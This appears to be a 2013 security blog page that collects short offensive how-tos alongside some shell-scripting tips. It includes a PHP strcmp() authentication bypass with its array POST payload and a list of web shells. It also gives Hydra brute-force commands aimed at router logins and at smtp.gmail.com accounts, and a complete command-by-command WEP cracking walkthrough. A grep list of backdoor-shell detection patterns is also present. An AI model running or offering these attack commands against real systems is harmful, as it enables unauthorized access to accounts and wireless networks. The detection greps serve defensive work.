Mar 9, 2013

Tools: Nishang - Powershell to Pentesting

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and post exploitation during Penetraion Tests. The scripts are written on the basis of requirement by the author during real Penetration Tests.  

Source: https://code.google.com/p/nishang/


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: BozoCrack - Google MD5 Crack Tool

BozoCrack is a depressingly effective MD5 password hash cracker with almost zero CPU/GPU load. Instead of rainbow tables, dictionaries, or brute force, BozoCrack simply finds the plaintext password. Specifically, it googles the MD5 hash and hopes the plaintext appears somewhere on the first page of results.

Source: https://github.com/juuso/BozoCrack 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Mar 7, 2013

Howto: Grep Common Web Vulnerabilities And Backdoor Shell

If you want full detail of all testing, please visit the Source.

Common Usage for Finding Vulnerabilities
- Command Injection
$ grep -Rn "shell_exec *( " /var/www
- LFI/RFI
$ grep -Rn "include *(" /var/www
$ grep -Rn "require *(" /var/www
$ grep -Rn "include_once *(" /var/www
$ grep -Rn "require_once *(" /var/www


Detect Backdoor Shell
$ grep -Rn "shell_exec *(" /var/www

$ grep -Rn "base64_decode *(" /var/www
$ grep -Rn "phpinfo *(" /var/www
$ grep -Rn "system *(" /var/www
$ grep -Rn "php_uname *(" /var/www
$ grep -Rn "chmod *(" /var/www
$ grep -Rn "fopen *(" /var/www
$ grep -Rn "fclose *(" /var/www
$ grep -Rn "readfile *(" /var/www
$ grep -Rn "edoced_46esab *(" /var/www
$ grep -Rn "eval *(" /var/www 
$ grep -Rn "passthru *(" /var/www
 
or
grep -RPn "(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile|php_uname|eval|tcpflood|udpflood|edoced_46esab) *\(" /var/www
find . -type f -name '*.php' | xargs grep -l "eval *(str_rot13 *(base64_decode *(" --color

find . -type f -name '*.php' | xargs egrep -i "(mail|fsockopen|pfsockopen|stream_socket_client|exec|system|passthru|eval|base64_decode) *\("

Source: blog.rootcon.org/2012/04/simple-kung-fu-grep-for-finding-common.html
 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Mar 6, 2013

Howto: Bypassing strcmp() function

If you want to see all detail to found this flaw, please go to the Source.
After analyzing the two cases described above I started "googling" for "strcmp php vulnerabilities" but did not find anything, then, by looking at PHP documentation and realized this function has only three possible return values:

int strcmp ( string $str1 , string $str2 )
Returns < 0 if str1 is less than str2; > 0 if str1 is greater than str2, and 0 if they are equal.

Obviously, we need to find a way to force strcmp to return 0 and be able to bypass line 5 (see above) without even knowing the password, so, I started wondering what would be the return value if there is an error during the comparison? So, I prepare a quick test comparing  str1 with an Array (or an Object) instead of another string:


$fields = array(
    'id' => '127.0.0.1',
    'ps' => 'bar'
); $a="danux";
 if (strcmp($a,$fields) == 0){
        echo " This is zero!!";
 }
 else{
       echo "This is not zero";
}



And got below warning from PHP:

PHP Warning:  strcmp() expects parameter 2 to be string, array given in ...

But guess what?Voila! it also returns the string "This is zero!!" In other words, it returns 0 as if both values were equal.

So, the last but not least step is to send an Array in the "ps" POST parameter so that we can bypass line 5, after some research and help from my friend Joe B. I learned I can send an array this way:

id=127.0.0.1&amp;ps[]=a

Notice that instead of sending "&ps=a", I also send the square brackets [] in the parameter name which will send an array object!! Also, notice that I am sending "id=127.0.0.1" so that I can get to the line 9.
And after sending this POST request...


Source: http://danuxx.blogspot.com/2013/03/unauthorized-access-bypassing-php-strcmp.html



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Web Shell For All By Security Aegis

Pentestmonkey’s REVERSE php shell:

b374k-shell (PHP):


AJAX Shell:

Weevely Shell:

The fuzzdb backdoor collection:

The laudanum set of injectable code:

Source: http://www.securityaegis.com/web-shells-for-all-2/



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Extract IP Address From String

After I used function to return the IP Address from some task, I got the "^[[H^[[2J" before IP Address. So I want to extract IP from the ^[[H^[[192.168.1.1. I used the regular expression to extract it like this example.

The Result From Function
gw=^[[H^[[2J192.168.1.1   
In the shell script, I write like this.
gw=`grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' <<< "$gw"
Now my $gw will be 192.168.1.1

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Mar 5, 2013

Howto: Cracking Router Password using THC Hydra

hydra -l username -P password_list_path -s router_port Router_IP_Address http-get /

Source: http://blog.hicubes.com/2013/03/cracking-router-password-using-thc-hydra-in-backtrack-tutorial.html

 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Create function in Shell Script

This post is example for writing function in shell script

Syntax
function_name()
{
     statement...
     statement...
     statement...
     statement...
     statement...

The Normal Function
hello()
{
         echo $1

hello "world"
 The output will be: world

The Return Function#1
hello()
{
         echo >&2 "$1"
         echo "return"
}
msg=$(hello "world")
echo [$msg]
The output will be:
world
[return]

The Return Function#2
hello()
{
         echo "$1"
         echo "return"
}
msg=$(hello "world")
echo [$msg]
The output will be:
[world return]

The Local Function
local_value()
{
         local value=23
         echo "Value in function is [$value]"
}
local_value
### Now try to print the value outside of function
echo "Value outside function is [$value]"
exit 0

The output will be:
Value in function is [23]
Value outside function is []

The Recursive Function
fact()
{
         local number=$1
         # Variable "number" must be declared as local, # otherwise this doesn't work.
         if [ "$number" -eq 0 ]
         then
                  factorial=1         # Factorial of 0 = 1.
         else
                  decrnum=`expr "$number" - 1`
                  fact $decrnum # Recursive function call.
                  factorial=`expr "$number" * $?`
         fi
         echo "$factorial"
}
fact $1
echo "Factorial of $1 is $?."

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Mar 4, 2013

Howto: Crack Wireless WEP without Client


1. Create Promiciuous mode
 airmon-ng start wlan0

2. Try to find the client and AP. 

airodump-ng mon0

3. Dump the traffic of specific AP.
airodump
-ng --bssid target_mac_ap -c 6 mon0


4. Fake Authentication to make the attacker machine be the client of AP
aireplay-ng -1 0 -a target_mac_ap -h attacker_mac mon0

or Make the fake authentication with keep-alive packet
aireplay-ng -1 6000 -o 1 -q 10 -a target_mac_ap -h attacker_mac -e ESSID_AP mon0
5.  Make the chop chop attack  or fragment attack
aireplay-ng --fragment -b target_mac_ap -h attacker_mac mon0
6. while you capture or make the fragment attack, if you found that "FromDS 1", that packet should be work to forge data packet.
7. Use packetforge-ng to create data packet
packetforge-ng --arp -a target_mac_ap -h attacker_mac -l 255.255.255.255 -k 255.255.255.255 -y file-that-FromDS1.xor -w fileoutput
8. Use aireplay-ng to replay attack with our forged data packet. (You should found that "ToDS 1")
aireplay-ng --interactive -r fileoutput mon0
9.   Try to capture again with
airodump-ng --bssid target_mac_ap -c channel_number -w save_capture_file mon0
10.   Crack it with aircrack-ng
aircrack-ng save_capture_file.pcap 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Use Hydra Brute Force Gmail.com

hydra -S -l test@gmail.com -P wordlist.txt -e ns -V -s 465 smtp.gmail.com smtp 



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |